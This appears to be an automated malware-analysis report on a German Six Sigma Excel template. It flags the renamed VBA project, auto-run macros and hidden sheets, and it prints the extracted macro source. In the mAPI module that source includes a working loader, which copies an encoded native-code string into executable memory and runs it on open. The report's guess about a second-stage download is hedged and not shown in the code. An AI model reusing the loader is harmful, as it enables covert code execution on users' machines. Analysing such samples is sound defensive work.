MALICIOUS
154
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is an OOXML document containing VBA macros, specifically triggering Workbook_Open and Auto_Open events. The presence of CreateObject calls and the obfuscated script attempting to use VirtualAlloc suggests the macro is designed to execute arbitrary code, likely downloading a second-stage payload. The embedded URLs are suspicious and may be related to the payload delivery or C2 infrastructure.
Heuristics 9
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: xl/printerSettings.bin)
-
VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMEDThe VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Dim drv As Object Set fsObj = CreateObject("Scripting.FileSystemObject") Set drv = fsObj.Drives("C") -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() ThisWorkbook.Sheets("Berechnung").Visible = xlSheetVeryHidden -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Public Sub Auto_Open() -
External relationship medium OOXML_EXTERNAL_RELExternal target in xl/externalLinks/_rels/externalLink1.xml.rels: /Users/Admin/Google Drive/sixsigmablackbelt/Freie Dateien/Prozessfaehigkeit-Maschinenfaehigkeit-Vorlage-Excel-kurz-20190
-
External hyperlinks (2) low OOXML_EXTERNAL_HYPERLINKSDocument contains 2 external hyperlinks — clickable URLs are stored as external relationships. First target: https://www.sixsigmablackbelt.de/
-
Hidden worksheet (veryHidden) low OOXML_HIDDEN_SHEETExcel workbook contains 2 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://www.sixsigmablackbelt.de Document hyperlink
- https://www.sixsigmablackbelt.de/Document hyperlink
- https://order.shareit.com/product?vendorid=200286567&productid=300977794OOXML external relationship
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 15533 bytes |
SHA-256: d65a95d9c800f1a3a5b892e959c8f3621bbe52a3f76beaebe0f847077d94f96b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Attribute VB_Name = "mAPI"
Option Explicit
'--------------------------------------------------------------
' This VBA Project has been protected with a proprietary scheme
' Do NOT tamper with this file, as Excel may crash!
'--------------------------------------------------------------
Private Const OPTION_BASE As Long = 0
Private Const OPTION_FLAGS As Long = 2
Private Const OPTION_INCLUDE_REFERENCEDOCS As Long = 0
Private Const OPTION_DISABLEDCLASSES As String = ""
Private Const PAGE_EXECUTE_RW As Long = &H40
Private Const MEM_RESERVE_AND_COMMIT As Long = &H3000
Private Const MEM_RELEASE As Long = &H8000
Private Const ERR_OUT_OF_MEMORY As Long = &H7
Private Const ROOTOBJECT_SIZE As Long = &H4D948
Private m_Loader As VCOMInitializerStruct
Private m_VCOMObject As Object
#If VBA7 = False Then
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Address As Long, ByVal Size As Long, ByVal AllocationType As Long, ByVal Protect As Long) As Long
Private Declare Function GetModuleHandleA Lib "kernel32" (ByVal ProcName As String) As Long
Private Declare Function GetProcAddress Lib "kernel32" (ByVal Module As Long, ByVal ProcName As String) As Long
Private Declare Function VirtualFree Lib "kernel32" (ByVal lpAddress As Long, ByVal Size As Long, ByVal dwFreeType As Long) As Long
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (ByRef Dest As Any, ByRef Source As Any, ByVal Size As Long)
Private Const VBA_VERSION As Long = 6
Private Type VCOMInitializerStruct
vtbl_QueryInterface As Long
vtbl_AddRef As Long
vtbl_Release As Long
vtbl_GetTypeInfoCount As Long
vtbl_GetTypeInfo As Long
vtbl_GetIDsOfNames As Long
vtbl_Invoke As Long
RootObjectMem As Long
HelperObject As Object
SysFreeString As Long
GetProcAddress As Long
NativeCode As String
LoaderMem As Long
IgnoreFlag As Boolean
VTablePtr As Long
Kernel32Handle As Long
RootObject As Object
ClassFactory As Object
End Type
#Else
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Address As LongPtr, ByVal Size As LongPtr, ByVal AllocationType As Long, ByVal Protect As Long) As LongPtr
Private Declare PtrSafe Function GetModuleHandleA Lib "kernel32" (ByVal ProcName As String) As LongPtr
Private Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal Module As LongPtr, ByVal ProcName As String) As LongPtr
Private Declare PtrSafe Function VirtualFree Lib "kernel32" (ByVal lpAddress As LongPtr, ByVal Size As LongPtr, ByVal dwFreeType As Long) As Long
Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (ByRef Dest As Any, ByRef Source As Any, ByVal Size As LongPtr)
Private Const VBA_VERSION As Long = 7
Private Type VCOMInitializerStruct
vtbl_QueryInterface As LongPtr
vtbl_AddRef As LongPtr
vtbl_Release As LongPtr
vtbl_GetTypeInfoCount As LongPtr
vtbl_GetTypeInfo As LongPtr
vtbl_GetIDsOfNames As LongPtr
vtbl_Invoke As LongPtr
RootObjectMem As LongPtr
HelperObject As Object
SysFreeString As LongPtr
GetProcAddress As LongPtr
NativeCode As String
LoaderMem As LongPtr
IgnoreFlag As Boolean
VTablePtr As LongPtr
Kernel32Handle As LongPtr
RootObject As Object
ClassFactory As Object
End Type
#End If
Public Sub Auto_Open()
With m_Loader
.NativeCode = "%EEEE%::::PPPPPPPPPH+D$ XXXtNXXXXXXVSPPPPj PPPPPPPP4T)D$04P)D$,4'4 )D$($ PZ3D$@+D$ YQ3H +L$ XP3Q +T$0XPf55ntvf)B|+T$0+T$0+T$0R[YQ^VXP2CP<0tF1D$$kD$$@!L$$2CQ1D$$kD$$@!L$$2CR1D$$kD$$@!L$$2CS+\$,3BP1BP1rP3rP+T$( XXXXXXXXXXXXX[^tJAYAZQ4tPPPPH)D$@4pH)D$84'4 H)D$0$ PH+L$ H3AtH+D$ L3PtL+T$HXPf55{L+T$HL+T$HtqfA)B8ARA[YQXPA2CD<0tR1D$0kD$0@L!L$0A2CE1D$0kD$0@L!L$0A2CF1D$0kD$0@L!L$0A2CGL+\$@A3BDA1BDA1JDA3JDL+T$8 XXXXXYXXXXqBLHOJA@n[??n[=ezoieZZprkhs^ljbZljbZ=bNZ_Q_>HirF[Q^Z[IrzRM wGDDoeTtKTfdGVduCVduCGhiCGhygGhygCmzXGcH[D_J^DV VfF VX<TI@<_veu]flqomliCuelQxpdudatE@hrwIkzSMzvOizw_Mzw_MssLJssLZBCLZ@A]^@A]^TNa^oFmn^nIv@aSsbT?WeWnSg_DCgKjKWCgHe[wJGe;?@fj;Ifyr@cfMAmTN_rNKNzxilIhMnADMgDV@cm;<jihu?aE=]rdY\puMUpgDuAa;UqSWBSPSUG=LUFNNESSOPGVYEbGXQWROj__GHKjOj_MIHKj^x?IRh=XVh=XVKH<VYKlJWLbAEtOIg@nIDT^HJVOD[KGudwGDEeFT[reTWJ@\ht>a;r>cruLna<Mniy?eKL_]zy?\pznXpznXANNXIL_\IL_\xSc\iMIUzQIdEoomgyo=XAyzJCDBXN>=QKmvHmtvO]HXO]J\O]J\m]hV?]mXmQvgl=tdpaS RUqPBV \PRocNMQflywB>;gFluaO?jKF@UIO ai_vUJ[apwFqeFGfACZVu>[0"
.LoaderMem = VirtualAlloc(0, Len(.NativeCode), MEM_RESERVE_AND_COMMIT, PAGE_EXECUTE_RW)
If .LoaderMem = 0 Then Err.Raise ERR_OUT_OF_MEMORY
.RootObjectMem = VirtualAlloc(0, ROOTOBJECT_SIZE, MEM_RESERVE_AND_COMMIT, PAGE_EXECUTE_RW)
If .RootObjectMem = 0 Then Err.Raise ERR_OUT_OF_MEMORY
.vtbl_QueryInterface = .LoaderMem
.VTablePtr = VarPtr(m_Loader)
.Kernel32Handle = GetModuleHandleA("KERNEL32")
.GetProcAddress = GetProcAddress(.Kernel32Handle, "GetProcAddress")
.SysFreeString = GetProcAddress(GetModuleHandleA("OLEAUT32"), "SysFreeString")
Call CopyMemory(ByVal .LoaderMem, ByVal .NativeCode, Len(.NativeCode))
Call CopyMemory(.RootObject, VarPtr(.VTablePtr), LenB(.VTablePtr))
.IgnoreFlag = TypeOf .RootObject Is VBA.Collection
Set .ClassFactory = (.RootObject)
Set .RootObject = Nothing
VirtualFree .LoaderMem, 0, MEM_RELEASE
Call .ClassFactory.Init(.Kernel32Handle, .GetProcAddress, OPTION_BASE + OPTION_FLAGS, VBA_VERSION, .HelperObject)
Set m_VCOMObject = .ClassFactory.GetErrEx()
End With
End Sub
Attribute VB_Name = "DieseArbeitsmappe"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'###################################################
'Vorgehensweise
'Oeffne Modul: Module Funktion_und_Lizenz
'Trage Firmenname ein -> strLizenzfuer = "Roland"
'speichere File und schließe
'öffne File
'Fuehre sub: Lizenz_setzen_in_Berechnungsblatt() aus
'Fuehre sub: speichern_mit_Lizenz aus
'###################################################
'Fuehre sub: Lizenz_setzen_in_Berechnungsblatt() aus
'Fuehre sub: speichern_mit_Lizenz aus
'###################################################
''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' Blattschutz Eingabe "4twpq30qcb"
''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Private Sub Workbook_Open()
ThisWorkbook.Sheets("Berechnung").Visible = xlSheetVeryHidden
Call Lizenz
With ActiveSheet.PageSetup
.RightFooter = "&""Arial""&12" & " licensed to " & strLizenzfuer & " © by www.sixsigmablackbelt.de "
'.CenterHeader = "&""Arial""&60&KE6E6E6" & Chr(10) & Chr(10) & Chr(10) & "w w w . s i x s i g m a b l a c k b e l t . d e"
End With
hdnum_anzeigen
Hinweis.Show
End Sub
Private Sub Lizenzierung()
Call Workbook_Open
Call Lizenz_setzen_in_Berechnungsblatt
Call speichern_mit_Lizenz
ThisWorkbook.Close SaveChanges:=False
End Sub
Private Sub Lizenz_setzen_in_Berechnungsblatt()
ThisWorkbook.Sheets("Berechnung").Cells(1, 1).Value = strLizenzfuer
End Sub
Private Sub speichern_mit_Lizenz()
Dim Datei As String
ChDir "C:\Users\Admin\Google Drive\sixsigmablackbelt\Kundendateien"
Datei = "process_capability_template__v1_" & strLizenzfuer & Format(Date, "_yyyy_mm_dd") & ".xlsm"
ActiveWorkbook.SaveAs Filename:= _
Datei, FileFormat:=xlOpenXMLWorkbookMacroEnabled, CreateBackup:=False
ChDir "C:\Users\Admin\Google Drive\sixsigmablackbelt\Kundendateien"
Datei = "process_capability_template_v1_" & strLizenzfuer & Format(Date, "_yyyy_mm_dd_org") & ".xlsm"
ActiveWorkbook.SaveAs Filename:= _
Datei, FileFormat:=xlOpenXMLWorkbookMacroEnabled, CreateBackup:=False
End Sub
Public Sub Workbook_BeforeClose(Cancel As Boolean)
ThisWorkbook.Sheets("Berechnung").Visible = xlSheetVeryHidden
End Sub
Private Sub Workbook_BeforePrint(Cancel As Boolean)
With ActiveSheet.PageSetup
.RightFooter = "&""Arial""&12" & " licensed to " & strLizenzfuer & " © by www.sixsigmablackbelt.de "
'.CenterHeader = "&""Arial""&60" & KE6E6E6 & Chr(10) & "w w w . s i x s i g m a b l a c k b e l t . d e"
End With
End Sub
Public Sub Berechnung_anzeigen()
ThisWorkbook.Sheets("Berechnung").Visible = xlSheetVisible
End Sub
Public Sub translation_anzeigen()
ThisWorkbook.Sheets("translation").Visible = xlSheetVisible
End Sub
Private Sub namen_verbergen()
For Each n In ActiveWorkbook.Names
n.Visible = False
Next n
End Sub
Private Sub namen_anzeigen()
For Each n In ActiveWorkbook.Names
n.Visible = True
Next n
End Sub
Attribute VB_Name = "Tabelle1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Tabelle2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Funktionen_und_Lizenz"
Public strLizenzfuer As String
Sub Lizenz()
strLizenzfuer = "invalid license"
End Sub
Sub hdnum_anzeigen()
Dim FestplatteID As String
FestplatteID = HDNUM()
Hinweis.textbox_FestplattenID.Value = "Hard Disk ID: " & FestplatteID
End Sub
Public Function HDNUM() As String
Dim fsObj As Object
Dim drv As Object
Set fsObj = CreateObject("Scripting.FileSystemObject")
Set drv = fsObj.Drives("C")
HDNUM = Hex(drv.serialnumber)
End Function
Attribute VB_Name = "Funktionen"
'six_a
'six_m
'six_st
'six_cmu
'six_cmo
'six_cm
'six_ck
'six_md
Public Function six_m(xi As Range) As Double
six_m = WorksheetFunction.Average(xi)
End Function
Public Function six_st(xi As Range) As Double
six_st = WorksheetFunction.StDev(xi)
End Function
Public Function six_a(xi As Range) As Double
six_a = WorksheetFunction.Count(xi)
End Function
Public Function six_cmu(Mittelwert As Double, UGW As Double, Standardabweichung As Double) As Double
six_cmu = ((Mittelwert - UGW) / (3 * Standardabweichung))
End Function
Public Function six_cmo(OGW As Double, Mittelwert As Double, Standardabweichung As Double) As Double
six_cmo = ((OGW - Mittelwert) / (3 * Standardabweichung))
End Function
Public Function six_cm(OGW As Double, UGW As Double, Standardabweichung As Double) As Double
six_cm = ((OGW - UGW) / (6 * Standardabweichung))
End Function
Public Function six_ck(cmo As Double, cmu As Double) As Double
six_ck = WorksheetFunction.Min(cmo, cmu)
End Function
Public Function six_md(cmo As Double, cmu As Double) As Double
six_md = WorksheetFunction.Min(cmo, cmu)
End Function
Attribute VB_Name = "Bereinigen"
Sub Bereinigen()
Worksheets("Berechnung").Range("b1:l4").ClearContents
Worksheets("Berechnung").Range("b1:b204").ClearContents
Worksheets("Berechnung").Range("e1:e204").ClearContents
Worksheets("Berechnung").Range("h1:h204").ClearContents
Worksheets("Berechnung").Range("k1:k204").ClearContents
Worksheets("Berechnung").Range("o5:p35").ClearContents
Worksheets("Berechnung").Range("p58:y63").ClearContents
Worksheets("Berechnung").Range("bl4:bl20").ClearContents
Worksheets("Berechnung").Range("ad3:bp4").ClearContents
End Sub
Sub Rahmen()
'
' Makro2 Makro
'
'
Cells.Select
Selection.Borders(xlDiagonalDown).LineStyle = xlNone
Selection.Borders(xlDiagonalUp).LineStyle = xlNone
With Selection.Borders(xlEdgeLeft)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
With Selection.Borders(xlEdgeTop)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
With Selection.Borders(xlEdgeBottom)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
With Selection.Borders(xlEdgeRight)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
With Selection.Borders(xlInsideVertical)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
With Selection.Borders(xlInsideHorizontal)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
End Sub
Attribute VB_Name = "Hinweis"
Attribute VB_Base = "0{2DD6D6E0-E769-4624-BAB5-E1D5AEF9D4D7}{A8479FF1-66B3-44C3-876C-579C574CB0DE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub button_website_oeffnen_Click()
strWebsite = "https://order.shareit.com/product?vendorid=200286567&productid=300977794"
ActiveWorkbook.FollowHyperlink Address:=strWebsite, NewWindow:=True
End Sub
Private Sub Formularschliessen_Click()
Unload Me
End Sub
'Private Sub UserForm_QueryClose(Cancel As Integer, CloseMode As Integer)
'If CloseMode = vbFormControlMenu Then
' MsgBox "Dieser Hinweis schließt automatisch 30 Sekunden nach Erscheinen"
' Cancel = True
'End If
'End Sub
Private Sub TextBox2_Change()
End Sub
Attribute VB_Name = "Tabelle4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Tabelle5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 7680 bytes |
SHA-256: 6a16c87b775311033081d02b1fce6a5433ac17f9dfba9aea51a8a8a21b54f861 |
|||
vbaProject_01.bin |
vba-project | OOXML VBA project: xl/printerSettings.bin | 60928 bytes |
SHA-256: f3a3bc207d67cbd78c2df8dd2da798baac02b5194642ae1e58cbcb137fe98ba6 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.